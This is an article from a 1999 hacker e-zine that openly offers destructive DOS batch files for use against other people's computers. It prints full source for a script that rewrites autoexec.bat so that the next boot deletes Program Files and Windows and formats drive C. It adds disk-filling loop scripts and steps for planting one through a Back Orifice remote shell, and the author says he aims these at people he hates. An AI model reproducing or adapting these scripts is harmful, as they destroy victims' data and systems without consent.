_________ SWAT MAGAZINE ISSUE SEVENTEEN: MAY 1999 __________ / \___________________________________________/ \ / Another few killer batch files \ / By -=The Firestarter=- \ ----------------------------------------------------------------------- SWATeam hard Drive Cleaner ========================== Looks like i never get board with creating batch files to fuck over hard drives, my latest creation is called "SWATeam Hard Drive Cleaner" well maybe the name isn't very original, but personally i couldn't give a fuck. I actually tested this batch file on my computer, well not with my current hard drive, I got a 270mb hard drive from Brakis a few months back, that drive has been the testing ground for most of my little creations. It took only two minutes to fuck it over, and all that time i thought that windows was loading (well ok i didn't, i actually knew what was happening). So what makes this little file so elite? well nothing really, it's a hell of a lot simpler than the previous version. This version doesn't take the time to cipher and then delete files, it simply deletes every thing on your hard drive, a good point is that it doesn't need any other programs (the last version did, remember) and it can be used if you just send it to somebody. A basic run down of this program is as follows: 1) It writes to the autoexec.bat awaiting the computer to reboot. 2) the computer reboots and all of the c:\progra~1 directory get's deleted 3) A few files get copied from the c:\windows\command directory 4) c:\windows get's deleted, as do all the subdirectories (isn't deltree great fun) 5) The hard drive get's formatted (unconditionaly; of course). Simple isn't it, like i said, it only takes two minutes, hmm hang on, it takes less than that because i removed the ability to fill the hard drive before deleting everything (copied c:\windows into one big huge file, then duplicated it several times before the drive was formatted. Some of you will think that programs like this are lame, but i don't give a shit, there's people out there that i hate with a passion, and what better way to digitally say "FUCK YOU" than to format there hard drive, hmm thinking about that last statement i think that ramming there head into the monitor and turning on the power might be a slightly better way to deal with them, but that would defeat the whole object of deleting there hard drive, perhaps ramming there head into the montor after they've reinstalled everything?. I'm rambling on here, i'll shut up about electrocuting people now. I mean this batch file has the same usage as the previous version, this one is also easier to use since it doesn't need to be "primed" by running it on the target computer in the c:\ directory. Anyway here's the source code for my loverly creation: --cut SHDC.BAT-- @ echo off rem OHHHH YEEEEEEEEEEAAAAAAAAAAAAAAAAAAAAHHHHHHHH The second version rem of this program is ready, more powerful than the first version, and rem overall, a far superiour annihilation tool. All bow down to the: rem SWATeam Hard Drive Cleaner! Guaranteed to give somebody a bad day. cls call attrib -h -r c:\autoexec.bat >nul echo @echo off >c:\autoexec.bat echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat echo format c: /q /u /autotest >nul >>c:\autoexec.bat Rem That little piece of code will ensure that the hard drive get's rem pretty much scrubbed. In my tests it took only 2 minutes to wipe rem a hard drive of a few hundred megs of data. rem So maybe it isn't as big as the firist version, but atleast it rem doesn't use any other programs as it copies the required files rem from the hard drive. Yes so it is very simple, it only took me rem five minutes to write, when i can be bothered i'll write a more rem efficent hard drive annihilator. You'll probably be able to get rem hold of it via http://www.swateam.org rem Coded by -=The Firestarter=- ('cause i was board) --cut SHDC.BAT-- yeah mearly by looking at the sorce code, anyone who knows anything about batch files, or even MS-DOS will know exactly what happens. Filler and KILLER FILLER ========================= Well incase some of you want to fill a hard drive without actually formatting it, since filling a hard drive can be just as problamatic for the poor sod who's computer it is. filler and KILLER FILLER are the same program, only KILLER FILLER is a lot faster than Filler. simply run this batch file: --cut fill.bat-- @echo off :fill echo a >nul >>fill.txt goto fill --cut fill.bat-- what that will do is create a file that contains a list of A's, the file will keep on growing until the hard drive is full or the file is prevented from running. Killer filler on the other hand... --cut killfill.bat-- @echo off :killfill echo LOOKS LIKE YA DRIVES FULL! >nul >>killfill.txt goto killfill --cut killfill.bat-- That would grow at a rate of about 300kb a second, or something near to that anyway. The disadvantage of that version is that there will almost certainly be left over space (ok so it will only be a few kb's), where as the first version will, at the most have only 1 byte left over from it. I actually tried a bigger version of this batch file, one that was 1.34mb big, that was extreamly fast and didn't take long to fill the 270mb hard drive, a gigabyte drive on the otherhand, well that would take ages. One advantage of these files is that they compress amazingly well, so they can be transferd to computers extreamly easily. So how long does it take to fill a hard drive? fucking ages is the answer. If one the other hand your into destroying computers using Back Orofice, then spawning c:\command.com on port 23, telnetting to it and then type this in: echo @echo off >killfill.bat echo :killfill >>killfill.bat echo echo LOOKS LIKE YA DRIVES FULL! >nul >>killfill.txt >>killfill.bat echo goto killfill >>killfill.bat then go to "spawn program" and spawn it as unviewable. Ok so it does still take ages, you can modify it to write to the autoexec.bat file if you really want. Anyway have fun messing about with those programs, i might write an article on batch files (on how to write them) some time in the near future.